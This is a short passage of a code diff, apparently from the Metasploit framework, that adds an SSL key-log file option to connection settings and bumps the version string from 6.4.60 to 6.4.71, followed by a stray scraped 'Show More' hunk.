              'SSLVerifyMode' =>  opts['SSLVerifyMode'] || ssl_verify_mode,
+              'SSLKeyLogFile' =>  opts['SSLKeyLogFile'] || sslkeylogfile,
              'SSLCipher'     =>  opts['SSLCipher'] || ssl_cipher,
              'Proxies'       => proxies,
              'Timeout'       => (opts['ConnectTimeout'] || connection_timeout || 10).to_i,
@@ -32,7 +32,7 @@ module Metasploit
        end
      end

-      VERSION = "6.4.60"
+      VERSION = "6.4.71"
      MAJOR, MINOR, PATCH = VERSION.split('.').map { |x| x.to_i }
      PRERELEASE = 'dev'
      HASH = get_hash
--- a/Show More
+++ b/Show More
@@ -1 +1 @@
 .2.5
 .2.8